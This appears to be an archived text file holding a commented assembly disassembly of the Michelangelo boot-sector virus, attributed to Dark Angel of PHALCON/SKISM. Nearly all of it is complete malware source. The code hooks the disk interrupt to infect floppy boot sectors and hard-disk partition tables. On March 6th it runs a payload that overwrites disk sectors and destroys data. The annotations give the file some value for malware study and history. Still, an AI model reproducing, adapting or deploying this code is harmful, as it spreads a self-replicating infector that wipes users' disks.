home *** CD-ROM | disk | FTP | other *** search
-
-
- ; This is a disassembly of the much-hyped michelangelo virus.
-
- ; As you can see, it is a derivative of the Stoned virus. The
-
- ; junk bytes at the end of the file are probably throwbacks to
-
- ; the Stoned virus. In any case, it is yet another boot sector
-
- ; and partition table infector.
-
-
-
- michelangelo segment byte public
-
- assume cs:michelangelo, ds:michelangelo
-
- ; Disassembly by Dark Angel of PHALCON/SKISM
-
- org 0
-
-
-
- jmp entervirus
-
- highmemjmp db 0F5h, 00h, 80h, 9Fh
-
- maxhead db 2 ; used by damagestuff
-
- firstsector dw 3
-
- oldint13h dd 0C8000256h
-
-
-
- int13h:
-
- push ds
-
- push ax
-
- or dl, dl ; default drive?
-
- jnz exitint13h ; exit if not
-
- xor ax, ax
-
- mov ds, ax
-
- test byte ptr ds:[43fh], 1 ; disk 0 on?
-
- jnz exitint13h ; if not spinning, exit
-
- pop ax
-
- pop ds
-
- pushf
-
- call dword ptr cs:[oldint13h]; first call old int 13h
-
- pushf
-
- call infectdisk ; then infect
-
- popf
-
- retf 2
-
- exitint13h: pop ax
-
- pop ds
-
- jmp dword ptr cs:[oldint13h]
-
-
-
- infectdisk:
-
- push ax
-
- push bx
-
- push cx
-
- push dx
-
- push ds
-
- push es
-
- push si
-
- push di
-
- push cs
-
- pop ds
-
- push cs
-
- pop es
-
- mov si, 4
-
- readbootblock:
-
- mov ax,201h ; Read boot block to
-
- mov bx,200h ; after virus
-
- mov cx,1
-
- xor dx,dx
-
- pushf
-
- call oldint13h
-
- jnc checkinfect ; continue if no error
-
- xor ax,ax
-
- pushf
-
- call oldint13h ; Reset disk
-
- dec si ; loop back
-
- jnz readbootblock
-
- jmp short quitinfect ; exit if too many failures
-
- checkinfect:
-
- xor si,si
-
- cld
-
- lodsw
-
- cmp ax,[bx] ; check if already infected
-
- jne infectitnow
-
- lodsw
-
- cmp ax,[bx+2] ; check again
-
- je quitinfect
-
- infectitnow:
-
- mov ax,301h ; Write old boot block
-
- mov dh,1 ; to head 1
-
- mov cl,3 ; sector 3
-
- cmp byte ptr [bx+15h],0FDh ; 360k disk?
-
- je is360Kdisk
-
- mov cl,0Eh
-
- is360Kdisk:
-
- mov firstsector,cx
-
- pushf
-
- call oldint13h
-
- jc quitinfect ; exit on error
-
- mov si,200h+offset partitioninfo
-
- mov di,offset partitioninfo
-
- mov cx,21h ; Copy partition table
-
- cld
-
- rep movsw
-
- mov ax,301h ; Write virus to sector 1
-
- xor bx,bx
-
- mov cx,1
-
- xor dx,dx
-
- pushf
-
- call oldint13h
-
- quitinfect:
-
- pop di
-
- pop si
-
- pop es
-
- pop ds
-
- pop dx
-
- pop cx
-
- pop bx
-
- pop ax
-
- retn
-
- entervirus:
-
- xor ax,ax
-
- mov ds,ax
-
- cli
-
- mov ss,ax
-
- mov ax,7C00h ; Set stack to just below
-
- mov sp,ax ; virus load point
-
- sti
-
- push ds ; save 0:7C00h on stack for
-
- push ax ; later retf
-
- mov ax,ds:[13h*4]
-
- mov word ptr ds:[7C00h+offset oldint13h],ax
-
- mov ax,ds:[13h*4+2]
-
- mov word ptr ds:[7C00h+offset oldint13h+2],ax
-
- mov ax,ds:[413h] ; memory size in K
-
- dec ax ; 1024 K
-
- dec ax
-
- mov ds:[413h],ax ; move new value in
-
- mov cl,6
-
- shl ax,cl ; ax = paragraphs of memory
-
- mov es,ax ; next line sets seg of jmp
-
- mov word ptr ds:[7C00h+2+offset highmemjmp],ax
-
- mov ax,offset int13h
-
- mov ds:[13h*4],ax
-
- mov ds:[13h*4+2],es
-
- mov cx,offset partitioninfo
-
- mov si,7C00h
-
- xor di,di
-
- cld
-
- rep movsb ; copy to high memory
-
- ; and transfer control there
-
- jmp dword ptr cs:[7C00h+offset highmemjmp]
-
- ; destination of highmem jmp
-
- xor ax,ax
-
- mov es,ax
-
- int 13h ; reset disk
-
- push cs
-
- pop ds
-
- mov ax,201h
-
- mov bx,7C00h
-
- mov cx,firstsector
-
- cmp cx,7 ; hard disk infection?
-
- jne floppyboot ; if not, do floppies
-
- mov dx,80h ; Read old partition table of
-
- int 13h ; first hard disk to 0:7C00h
-
- jmp short exitvirus
-
- floppyboot:
-
- mov cx,firstsector ; read old boot block
-
- mov dx,100h ; to 0:7C00h
-
- int 13h
-
- jc exitvirus
-
- push cs
-
- pop es
-
- mov ax,201h ; read boot block
-
- mov bx,200h ; of first hard disk
-
- mov cx,1
-
- mov dx,80h
-
- int 13h
-
- jc exitvirus
-
- xor si,si
-
- cld
-
- lodsw
-
- cmp ax,[bx] ; is it infected?
-
- jne infectharddisk ; if not, infect HD
-
- lodsw ; check infection
-
- cmp ax,[bx+2]
-
- jne infectharddisk
-
- exitvirus:
-
- xor cx,cx ; Real time clock get date
-
- mov ah,4 ; dx = mon/day
-
- int 1Ah
-
- cmp dx,306h ; March 6th
-
- je damagestuff
-
- retf ; return control to original
-
- ; boot block @ 0:7C00h
-
- damagestuff:
-
- xor dx,dx
-
- mov cx,1
-
- smashanothersector:
-
- mov ax,309h
-
- mov si,firstsector
-
- cmp si,3
-
- je smashit
-
- mov al,0Eh
-
- cmp si,0Eh
-
- je smashit
-
- mov dl,80h ; first hard disk
-
- mov maxhead,4
-
- mov al,11h
-
- smashit:
-
- mov bx,5000h ; random memory area
-
- mov es,bx ; at 5000h:5000h
-
- int 13h ; Write al sectors to drive dl
-
- jnc skiponerror ; skip on error
-
- xor ah,ah ; Reset disk drive dl
-
- int 13h
-
- skiponerror:
-
- inc dh ; next head
-
- cmp dh,maxhead ; 2 if floppy, 4 if HD
-
- jb smashanothersector
-
- xor dh,dh ; go to next head/cylinder
-
- inc ch
-
- jmp short smashanothersector
-
- infectharddisk:
-
- mov cx,7 ; Write partition table to
-
- mov firstsector,cx ; sector 7
-
- mov ax,301h
-
- mov dx,80h
-
- int 13h
-
- jc exitvirus
-
- mov si,200h+offset partitioninfo ; Copy partition
-
- mov di,offset partitioninfo ; table information
-
- mov cx,21h
-
- rep movsw
-
- mov ax,301h ; Write to sector 8
-
- xor bx,bx ; Copy virus to sector 1
-
- inc cl
-
- int 13h
-
- ;* jmp short 01E0h
-
- db 0EBh, 32h ; ?This should crash?
-
- ; The following bytes are meaningless.
-
- garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
-
- partitioninfo: db 42h dup (0)
-
- michelangelo ends
-
- end
-
-
